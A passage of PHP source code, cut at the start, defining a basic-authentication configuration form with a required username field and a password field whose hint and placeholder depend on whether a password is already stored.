$this->set('strict_matching', !!$mode); } public function updateInfo($vars) { return parent::updateAll($vars); } } /* * Basic Authentication Configuration Form * */ class BasicAuthConfigForm extends AbstractForm { private $account; private $host; private $password; function __construct($source=null, $options=array()) { parent::__construct($source, $options); } private function getPassword() { return $this->_source['passwd']; } function buildFields() { $password = $this->getPassword(); return array( 'username' => new TextboxField(array( 'required' => true, 'label' => __('Username'), 'configuration' => array( 'length' => 0, 'autofocus' => true, ), )), 'passwd' => new PasswordField(array( 'label' => __('Password'), 'required' => !$password, 'validator' => 'noop', 'hint' => $password ? __('Enter a new password to change current one') : '', 'configuration' => array( 'length' => 0, 'classes' => 'span12', 'placeholder' => $password ? str_repeat('•', strlen($password)*2) : __('Password'), ), )), ); } } ?>